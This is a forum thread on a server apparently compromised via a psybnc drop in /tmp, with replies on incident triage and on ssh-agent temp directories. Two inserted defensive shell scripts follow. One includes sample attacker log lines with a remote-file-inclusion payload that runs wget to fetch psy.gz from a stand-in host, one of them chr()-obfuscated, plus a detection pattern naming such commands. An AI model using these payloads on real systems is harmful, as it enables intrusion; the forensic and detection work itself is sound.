LinuxQuestions.org > Linux - Security
Linux - Security: This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
Thread: /tmp folder

#1  bytez (LQ Newbie; CentOS 4.5), 10-01-2006, 08:43 PM

I'm seeing many folders beginning with "ssh"; is that normal? Also, I noticed a psy folder there; it looks like psybnc is installed. I have removed that folder and the psy.gz file.
 
#2  w3bd3vil (Senior Member; Fedora), 10-02-2006, 03:11 AM

This could mean serious trouble. bnc must be installed in other places also (my guess).
Check your netstat for any new ports that are open. Check ps for suspicious processes. Use chkrootkit to see if it detects anything. You would want to see your logs as to where the intruder came in from.
This could probably be something like a remote file inclusion in phpbb or something, so check your apache logs.
Search for world-writable directories too and see if there is anything installed in them.
 
#3  jkh (Member; Ubuntu), 10-02-2006, 05:56 AM

Oh yeah, I have those folders too, always have (ssh folders). I assume they are harmless.
 
#4  richardash1981 (LQ Newbie), 10-04-2006, 06:06 AM

If you are using ssh then temp folders may be normal; I don't get them with OpenSSH though. Either way they won't be needed after a reboot, so removing the lot and rebooting should work fine (in theory you can dump the whole of /tmp, but I've found X was a bit picky about that). If you think you might have a security problem then you need to get busy with netstat as w3bd3vil describes.
 
#5  Capt_Caveman (Senior Member; Fedora), 10-04-2006, 08:21 AM

If you have psybnc source code in /tmp and you didn't put it there, then that is a very bad sign. First, who owned the file(s)? I would also recommend that you don't delete any more files or directories until you have a better idea of what is going on. Do follow w3bd3vil's advice and look carefully through your apache logs, especially for URLs that have shell commands like wget, cd, etc. or contain psy.gz. Don't ignore the issue and delude yourself into thinking everything is ok until you can be definitely sure of that.

The following will give you a good start:
http://www.cert.org/tech_tips/intrud...checklist.html
http://www.cert.org/tech_tips/root_compromise.html

If you have any questions about stuff or don't know what to look for, then make sure to ask.
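The checks suggested in #2 and #5 (who owns the dropped files, what the Apache log shows, which directories are world-writable, what is listening) as one triage script. This is an added example, not code from the thread or from any of the posters; it runs against constructed sample data (the four log lines and the fake /tmp tree are made up for the demo), and the real paths it names (/var/log/httpd/access_log, /tmp, /var/tmp, /dev/shm) are assumptions to adjust for the host.

```shell
#!/bin/sh
# Added example, not from the thread: a first-pass triage for the situation
# above (an unexpected psybnc drop in /tmp). Everything below runs against
# constructed sample data so it works offline; on the suspect host, point the
# functions at the real paths (assumed: /var/log/httpd/access_log, /tmp,
# /var/tmp, /dev/shm) and run as root.

# 1. Who owned the dropped files? Record numeric uid/gid before touching them;
#    a file owned by the web server's uid points at the web app as the entry.
owner_of() {                      # usage: owner_of <path>   -> "uid gid"
    ls -lnd "$1" | awk '{ print $3, $4 }'
}

# 2. Apache access log: requests that pull a remote URL in through a query
#    parameter (remote file inclusion), carry shell commands or the dropped
#    archive name in the URL, or call PHP exec functions, possibly spelled out
#    with chr() to dodge naive filters.
RFI_PATTERN='=(https?|ftp)://|wget(%20| )|cd(%20| )/(tmp|var/tmp|dev/shm)|chmod(%20| )|psy\.gz|psybnc|(system|passthru|shell_exec|exec)\(|chr\('
find_rfi_hits() {                 # usage: find_rfi_hits  < access_log
    grep -iE "$RFI_PATTERN"
}
count_rfi_hits() {                # usage: count_rfi_hits < access_log
    grep -ciE "$RFI_PATTERN" || true      # grep -c exits 1 on zero matches
}

# 3. World-writable directories: anywhere the web server's uid can write is a
#    candidate drop location, not just /tmp.
list_world_writable_dirs() {      # usage: list_world_writable_dirs <root>...
    find "$@" -xdev -type d -perm -0002 2>/dev/null
}

# 4. Files changed recently under a directory, with numeric owner, as evidence.
recent_files() {                  # usage: recent_files <days> <dir>...
    days=$1; shift
    find "$@" -xdev -type f -mtime "-$days" -exec ls -ln {} \; 2>/dev/null
}

# 5. Live state (host-specific, so not exercised on the demo data): listening
#    sockets with owning processes, and processes whose executable lives in a
#    temp directory or has been deleted from disk.
live_checks() {
    if command -v ss >/dev/null 2>&1; then ss -lntup; else netstat -lntup; fi 2>/dev/null
    ls -l /proc/[0-9]*/exe 2>/dev/null | grep -E '/tmp/|/var/tmp/|/dev/shm/|\(deleted\)'
}

# --- constructed demo data: four Apache common-log lines, two from an attacker --
SAMPLE_LOG='10.0.0.5 - - [01/Oct/2006:20:10:31 -0500] "GET /forum/index.php?page=1 HTTP/1.1" 200 5123
198.51.100.7 - - [01/Oct/2006:20:11:40 -0500] "GET /gallery/index.php?inc=http://198.51.100.9/c.txt?&cmd=cd%20/tmp;wget%20http://198.51.100.9/psy.gz HTTP/1.1" 200 88
10.0.0.5 - - [01/Oct/2006:20:12:02 -0500] "GET /images/logo.png HTTP/1.1" 200 4411
198.51.100.7 - - [01/Oct/2006:20:12:55 -0500] "GET /forum/viewtopic.php?t=3&highlight=%2527.passthru(chr(119).chr(103).chr(101).chr(116)) HTTP/1.1" 200 90'

demo=$(mktemp -d)
mkdir -m 1777 "$demo/tmp"                 # stands in for the real /tmp
printf 'not really a tarball\n' > "$demo/tmp/psy.gz"

echo "== owner (uid gid) of the dropped file"; owner_of "$demo/tmp/psy.gz"
echo "== suspicious Apache requests";        printf '%s\n' "$SAMPLE_LOG" | find_rfi_hits
echo "== world-writable directories";        list_world_writable_dirs "$demo"
echo "== files changed in the last 7 days";  recent_files 7 "$demo/tmp"
rm -rf "$demo"
```

On the real host, `find_rfi_hits < /var/log/httpd/access_log` and `live_checks` are the two that matter most; note that the fourth sample line spells out "wget" with chr() calls, which is why the pattern matches on the PHP function names and not only on the literal command words. Copy the log and the dropped files somewhere safe (`cp -a`) before doing anything else, per #5.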
 
#6  sixerjman (Member; Debian Testing / Unstable), 10-04-2006, 08:05 PM

/tmp/ssh-XXXXXXXX file(s) may be ssh-agent files.

If ssh-agent is started when a remote client logs in, a subdirectory with this type of name will be created and will contain one symbolic link named agent.PPPP, where "PPPP" is the PID of the agent.

One of these is created automatically when a local GNOME X session is started (probably also for KDE and other GUIs) so that an X terminal started in the GUI doesn't need to prompt for the password.
 
#7  sixerjman (Member; Debian Testing / Unstable), 10-04-2006, 08:15 PM

Check that: the PID is the PID of the process that invoked the agent. On my machine I currently have one such directory, and the file is actually a system file of some sort, not a symbolic link (I think).
 
#8  sixerjman (Member; Debian Testing / Unstable), 10-04-2006, 08:15 PM

...and the PID is that of "gnome-session". So noted regarding edit. :-)

Last edited by sixerjman; 10-26-2006 at 10:42 AM.
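Pinning down what #6 through #8 describe: the entry inside /tmp/ssh-XXXXXXXX is a UNIX-domain socket named agent.<PID>, and the PID is that of the process that launched ssh-agent (gnome-session here; a login shell or sshd in other setups), not the agent's own. That gives a concrete test for the original question of whether the "ssh" folders are harmless. The script below is an added example, not code from the thread or from OpenSSH; the two demo directories it builds are constructed, and the /tmp/ssh-* glob is the only real path it touches.

```shell
#!/bin/sh
# Added example, not from the thread: tell a genuine ssh-agent directory in
# /tmp apart from a drop that only borrows the name. ssh-agent creates
# /tmp/ssh-XXXXXXXX (random suffix, mode 0700, owned by the user) holding one
# UNIX-domain socket, agent.<PID>, where <PID> is the process that launched the
# agent (gnome-session, a login shell, ...). Anything else in such a directory
# was not put there by ssh-agent.

agent_pid_from_name() {          # usage: agent_pid_from_name agent.1234 -> 1234
    case $1 in
        agent.*) pid=${1#agent.} ;;
        *)       return 1 ;;
    esac
    case $pid in ''|*[!0-9]*) return 1 ;; esac
    printf '%s\n' "$pid"
}

# Prints "<dir>: OK" or "<dir>: <issue> [<issue> ...]" with these issues:
#   perms:<mode>     directory is not drwx------ as mkdtemp(3) leaves it
#   not-a-socket     agent.<PID> is not a socket, so ssh-agent did not make it
#   stale            no process with that PID exists any more
#   owner-mismatch   that process runs as a different user than the dir owner
#   extra:<name>     an entry that is not agent.<PID> (a drop hiding in plain sight)
check_agent_dir() {              # usage: check_agent_dir /tmp/ssh-XXXXXXXX
    dir=$1 issues=''
    dir_user=$(ls -ld "$dir" | awk '{ print $3 }')
    mode=$(ls -ld "$dir" | cut -c1-10)
    [ "$mode" = 'drwx------' ] || issues="$issues perms:$mode"
    for entry in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$entry" ] || [ -L "$entry" ] || continue     # unmatched glob
        name=${entry##*/}
        if pid=$(agent_pid_from_name "$name"); then
            [ -S "$entry" ] || issues="$issues not-a-socket"
            proc_user=$(ps -p "$pid" -o user= 2>/dev/null | awk 'NR == 1 { print $1 }')
            if [ -z "$proc_user" ]; then
                issues="$issues stale"
            elif [ "$proc_user" != "$dir_user" ]; then
                issues="$issues owner-mismatch"
            fi
        else
            issues="$issues extra:$name"
        fi
    done
    printf '%s:%s\n' "$dir" "${issues:- OK}"
}

# Constructed demo: two look-alike directories, then whatever the host has.
demo=$(mktemp -d)
mkdir -m 700 "$demo/ssh-Zz9Demo01" "$demo/ssh-Zz9Demo02"
: > "$demo/ssh-Zz9Demo01/agent.$$"        # a regular file, not a socket
: > "$demo/ssh-Zz9Demo01/psy.gz"          # the drop
: > "$demo/ssh-Zz9Demo02/agent.4194304"   # above Linux's largest PID: never alive
for d in "$demo"/ssh-* /tmp/ssh-*; do
    if [ -d "$d" ]; then check_agent_dir "$d"; fi
done
rm -rf "$demo"
```

A directory that reports OK still deserves one look at `ps -p <PID> -o user=,comm=` for the PID in the socket name; it should be a session or login process belonging to the directory's owner, as sixerjman found with gnome-session. A "stale" result alone is usually just an agent that outlived its session, but "not-a-socket", "extra:" or "owner-mismatch" means something other than ssh-agent wrote there, and per #5 the files should be preserved rather than deleted.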
 
#9  jkh (Member; Ubuntu), 10-21-2006, 05:23 AM

Very smart, sixerjman. I had no idea GNOME did that. Also, for the future, you can edit your post to add stuff to it rather than posting two more posts. Just saying.
 
#10  jayjwa (Member; None (src & compile)), 10-24-2006, 01:10 AM

psybnc (sort of a proxy for IRC clients, or "bouncer" as they call them) is usually the first thing added by script kiddies after a system break-in. If you didn't put it there, you're definitely hacked. Worse, many times psybnc (and other tools from these types) is infected with the Linux virus RST (judging from the samples I've collected over the years).

It's looking like re-build/re-install time...
 